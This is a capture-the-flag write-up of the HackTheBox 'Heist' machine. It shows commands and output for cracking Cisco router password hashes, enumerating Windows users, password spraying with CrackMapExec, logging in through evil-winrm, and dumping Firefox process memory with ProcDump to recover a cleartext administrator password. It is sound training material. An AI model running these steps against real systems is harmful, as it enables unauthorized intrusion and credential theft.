HackTheBox - Heist

6 minute read

Heist was a nice 20 point box created by MinatoTW. It started out with finding a Cisco router config file and cracking some hashes, enumerating more users and then logging in via WinRM to get the user flag. We then dumped the local Firefox processes with ProcDump, used some simple PowerShell for basic process dump analysis, found admin credentials and logged in again via WinRM to get root.

User.txt

Nmap


We start the box with a quick TCP nmap scan:

# ports=$(nmap -sT -p- --min-rate=5000 --max-retries=2 10.10.10.149 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) && 
nmap -sV -sC -T4 -p$ports 10.10.10.149

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49668/tcp open  msrpc         Microsoft Windows RPC


HTTP


Navigating to http://10.10.10.149/ we come across a login page:


Clicking on ‘Login as guest’ leads us to issues.php which contains the following information:


Checking out the ‘Attachment’ on the first post by Hazard displays a config.txt file for their Cisco router:

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0Â mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh


Hash Cracking


The config.txt file contains the following three hashes:

enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408

The number 7 next to the bottom two password hashes indicates that they are Cisco type 7 and can be easily decrypted at Cisco Password Cracker. The results are shown below:



The $1$pdQG$o8nrSzsGXeaduXrjlvKc91 hash can be cracked quickly with JohnTheRipper:

# john --wordlist=/root/rockyou.txt --rules hash 
stealth1agent    (?)


Credentials


From what we’ve gathered so far we can create a list of usernames and passwords we’ve found and cracked in the config.txt file:

Hazard / ??? - stealth1agent maybe?
rout3r / $uperP@ssword
admin  / Q4)sJu\Y8qz*A3?d

Given that none of these credentials work on the first login screen we encountered on port 80, we can deduce that they are needed elsewhere in order for us to progress.

From our nmap scan we can see that SMB (445) and WinRM (5985) are both open, none of the creds succeded for WinRM but hazard / stealth1agent did work for SMB. However there wasn’t anything of use in any of the shares.


Lookupsid.py


Leveraging the lookupsid.py script from Impacket we’re able to enumerate for more users with Hazard’s SMB credentials.

A Windows SID brute forcer example through [MS-LSAT] MSRPC Interface, aiming at finding remote users/groups.

# python lookupsid.py heist/hazard:stealth1agent@10.10.10.149
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Brute forcing SIDs at 10.10.10.149
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

Descriptions of each Impacket script can be found here.


CrackMapExec


As we’ve now got a lot more usernames to work with, we can use CrackMapExec to check if any of the new usernames can be used with the passwords we already possess in order to log into SMB. First we need to create a usernames file:

# cat usernames 
Administrator
Guest
DefaultAccount
WDAGUtilityAccount
None
support
Chase
Jason
rout3r
admin

Secondly we create a passwords file with the three hashes inside:

# cat passwords 
stealth1agent
$uperP@ssword
Q4)sJu\Y8qz*A3?d

All we have to do now is run the following CrackMapExec command:


We see Chase / Q4)sJu\Y8qz*A3?d was successful.


Evil-winrm


Since WinRM is open (5985) we can use evil-winrm to log in with these credentials:

# ./evil-winrm.rb -i 10.10.10.149 -u chase -p 'Q4)sJu\Y8qz*A3?d'

Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents> whoami
supportdesk\chase


Flag


All we have to do now is change directory and we get the user flag.

*Evil-WinRM* PS C:\Users\Chase\Documents> cd ..
*Evil-WinRM* PS C:\Users\Chase> cd desktop
*Evil-WinRM* PS C:\Users\Chase\desktop> cat user.txt
a127da...


Root.txt

Enumeration


During our usual enumeration we notice there are multiple Firefox processes running:

*Evil-WinRM* PS C:\Users\Chase\desktop> Get-Process 

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
   1233      68   106768     179916      27.86   2236   1 firefox
                                                                
    343      20    10056      37456       0.55   3164   1 firefox
                                                                
    408      31    17432      61252       2.02   4036   1 firefox
                                                                
    390      30    27464      59848      22.55   4348   1 firefox
                                                              
    358      26    16324      37588       0.47   6256   1 firefox  


ProcDump


ProcDump is a tool we can use to dump the Firefox process data.

ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. It also can serve as a general process dump utility that you can embed in other scripts.


Dumping Firefox Processes


Once you’ve downloaded ProcDump from the link in the previous section, we then need to upload it to Heist like so:

*Evil-WinRM* PS C:\Users\Chase\Documents> upload /root/Downloads/procdump.exe
Info: Uploading /root/Downloads/procdump.exe to .
Data: 868564 bytes of 868564 bytes copied
Info: Upload successful!

*Evil-WinRM* PS C:\Users\Chase\Documents> dir

    Directory: C:\Users\Chase\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       11/28/2019   7:13 PM         651424 procdump.exe 

With ProcDump successfully uploaded we can dump each Firefox process and then analyse the files for any sensitive information:

*Evil-WinRM* PS C:\Users\Chase\Documents> .\procdump.exe -accepteula -ma 6256
  
ProcDump v9.0 - Sysinternals process dump utility 
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com   
                                                        
[19:14:54] Dump 1 initiated: C:\Users\Chase\Documents\firefox.exe_191128_191454.dmp 
[19:14:55] Dump 1 writing: Estimated dump file size is 280 MB.         
[19:14:59] Dump 1 complete: 280 MB written in 5.0 seconds 
[19:15:00] Dump count reached.                                            


Process Dump Analysis


After dumping each process we can then use the PowerShell cmdlet Select-String to ‘grep’ through the dump file for specific words/patterns.

The Select-String cmdlet searches for text and text patterns in input strings and files.

Looking for instances of the string ‘admin’ we get the following information returned:

*Evil-WinRM* PS C:\Users\Chase\Documents> cat firefox.exe_191128_191454.dmp | Select-String -Pattern 'admin'  
                                                             
_DATA_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_C¨^·(VœàšgÿP÷‚]CTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Crash                  
Reports\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla        
Firefox\firefox.exeMOZ¨^·(VœGgÿGgÿRG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=MOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Prog 
ram Files\Mozilla Firefox\browser\crashreporter-override.iniNU

Removing all the junk we see a login request made by the admin with their username and password in clear text:

/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ

With these credentials we’re able to login via WinRM as Administrator.

# ./evil-winrm.rb -i 10.10.10.149 -u Administrator -p '4dD!5}x/re8]FBuZ'

Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
supportdesk\administrator


Flag


All we have to do now is change directory and we get root.

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
50dfa3...